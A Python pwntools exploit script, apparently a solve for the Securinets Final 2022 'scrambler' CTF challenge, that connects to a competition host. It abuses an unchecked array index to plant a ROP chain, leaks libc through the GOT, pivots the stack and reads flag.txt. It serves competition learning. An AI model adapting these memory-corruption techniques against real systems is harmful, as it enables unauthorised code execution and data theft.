securinets final 2022 - scramble solve
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./scrambler --host 20.203.124.220 --port 1235
from pwn import *

# Set up pwntools for the correct architecture. `exe` is reused further down
# for .bss(), GOT, symbol-search and libc lookups, so it must be the patched
# binary that is actually run/attacked.
exe = context.binary = ELF('./scrambler_patched')

# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
# HOST / PORT on the command line override the values baked in by the template.
host = args.HOST if args.HOST else '20.203.124.220'
port = int(args.PORT if args.PORT else 1235)
def start_local(argv=[], *a, **kw):
    '''Execute the target binary locally.

    `argv` is appended after exe.path. When GDB is present in `args` the
    process is launched under gdb.debug with the module-level `gdbscript`;
    otherwise a plain process() is spawned. Extra positional and keyword
    arguments are forwarded to whichever launcher is used.
    '''
    cmd = [exe.path] + argv
    if not args.GDB:
        return process(cmd, *a, **kw)
    return gdb.debug(cmd, gdbscript=gdbscript, *a, **kw)
def start_remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host.

    Opens a TCP connection to the module-level host:port. `argv`, `a` and
    `kw` exist only for signature parity with start_local; they are not used
    for the connection. With GDB in `args`, gdb is attached to the live
    connection using `gdbscript`.
    '''
    conn = connect(host, port)
    if args.GDB:
        gdb.attach(conn, gdbscript=gdbscript)
    return conn
def start(argv=[], *a, **kw):
    '''Start the exploit against the target.

    Dispatches on args.LOCAL: a local process when it is set, a remote
    connection otherwise. All arguments are forwarded unchanged.
    '''
    launcher = start_local if args.LOCAL else start_remote
    return launcher(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
# Break once at the ELF entry point, then let the program run. The entry
# address is filled in from the module-level `exe`.
gdbscript = '''
tbreak *0x{exe.entry:x}
continue
'''.format(exe=exe)
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch:     amd64-64-little
# RELRO:    Partial RELRO
# Stack:    Canary found
# NX:       NX enabled
# PIE:      No PIE (0x400000)
# "No PIE" is what the rest of the script relies on: exe.bss(), exe.got and
# the "%d" string found in the binary are fixed addresses and need no leak.
# The only leak required is libc's, obtained through puts(GOT[puts]) below.
io = start()
def write_array_payload(offset, payload):
    '''Write `payload` into the target's array, one byte per menu round-trip.

    Menu option 1 takes (arg1, arg2, arg3); this script always sends arg1=1,
    arg2=index and arg3=value, so each byte of `payload` is stored at index
    `offset + position`. After every sixth byte (positions 0, 6, 12, ...) an
    extra write of 0 to index -4 is issued; its purpose is not evident from
    this script (presumably it resets some state the binary keeps in front of
    the array — TODO confirm against the binary). The binary appears not to
    validate arg2 at all (a negative index and indices well past the start
    are accepted), and that unchecked index is the bug this solve rests on.
    '''
    def poke(index, value):
        # One round-trip of the option-1 write: prompt, arg1, arg2, arg3.
        io.sendlineafter(b'>', b'1')
        io.sendlineafter(b'arg1', b'1')
        io.sendlineafter(b'arg2', str(index).encode('ascii'))
        io.sendlineafter(b'arg3', str(value).encode('ascii'))

    for position, byte in enumerate(payload):
        poke(offset + position, byte)
        if position % 6 == 0:
            poke(-4, 0)
# Scratch areas in .bss; the binary has no PIE, so these are fixed addresses.
# new_stack receives the second ROP chain and becomes the pivoted stack,
# store_loc first holds a "%s" string and later the bytes read from the file.
new_stack = exe.bss()+0x100
store_loc = exe.bss()+0x200
# percent_s is where a "%s\0\0" string will be placed at runtime (written
# through the scanf("%d") call below); percent_d is a "%d" string that
# already exists inside the binary.
percent_s = store_loc
percent_d = next(exe.search(b'%d\x00'))
# First chain, laid out through the array write primitive.
rop = ROP(exe)
# Step 1: print the GOT entry of puts to leak its libc address.
rop.puts(exe.got['puts'])
# Step 2: set rbp to new_stack. The bare `ret` is presumably for 16-byte
# stack alignment ahead of the libc calls — TODO confirm.
rop.rbp = new_stack
rop.raw(rop.ret)
# Step 3: scanf("%d", store_loc). The decimal sent later (u32 of "%s\0\0")
# is stored at store_loc, turning it into a "%s" format string.
rop.call('__isoc99_scanf',(percent_d, percent_s))
# Step 4: scanf("%s", new_stack) reads the second chain directly into .bss.
rop.call('__isoc99_scanf',(percent_s, new_stack))
#rop.migrate(new_stack)
# Step 5: pivot. `leave` does mov rsp,rbp; pop rbp, so with rbp = new_stack+8
# execution continues from the slot at new_stack+16 onwards.
rop.rbp = new_stack+8
rop.raw(rop.leave)
print(rop.dump())
payload = rop.chain()
# Store the chain byte-by-byte starting at index 40 (8*5); it presumably
# runs when option 2 makes the function return, right after "Good bye!".
write_array_payload(8*5, payload)
io.sendlineafter(b'>', b'2')
io.recvuntil(b'Good bye!\n')
# puts() output: the raw little-endian address followed by a newline, which
# [:-1] strips; unpack(..., 'all') turns whatever bytes remain into an int.
puts_leak = io.recvline()
puts_leak = unpack(puts_leak[:-1],'all')
print('puts_leak', hex(puts_leak))
# Rebase the libc that pwntools associated with the patched binary.
libc = exe.libc
libc.address = puts_leak - libc.symbols['puts']
print('libc', hex(libc.address))
# Input for step 3: the bytes "%s\0\0" as a decimal integer.
io.sendline(str(u32(b'%s\x00\x00')).encode('ascii'))
# Second chain, built with base=new_stack so that addresses inside it (the
# 'flag.txt' string) resolve to where scanf stores it.
rop = ROP([exe, libc], base=new_stack)
# Two padding slots: the pivot in step 5 skips slot 0 and pops slot 1 into
# rbp before the first real gadget at slot 2 — inferred, TODO confirm.
rop.raw(rop.ret)
rop.raw(rop.ret)
# rop.open() uses openat() so do a syscall
rop.call(libc.symbols['syscall'],(constants.SYS_open, 'flag.txt', 0, 0))
# Assumes the file just opened received fd 3 (0-2 being stdio) — TODO confirm.
rop.read(3, store_loc, 100)
rop.write(1, store_loc, 100)
rop.abort()
print(rop.dump())
# Input for step 4: the second chain itself.
io.sendline(rop.chain())
# Re-sending the first payload here: its purpose is not evident from this
# script (possibly filler for the read above) — TODO confirm.
io.send(payload)
print(io.recvall())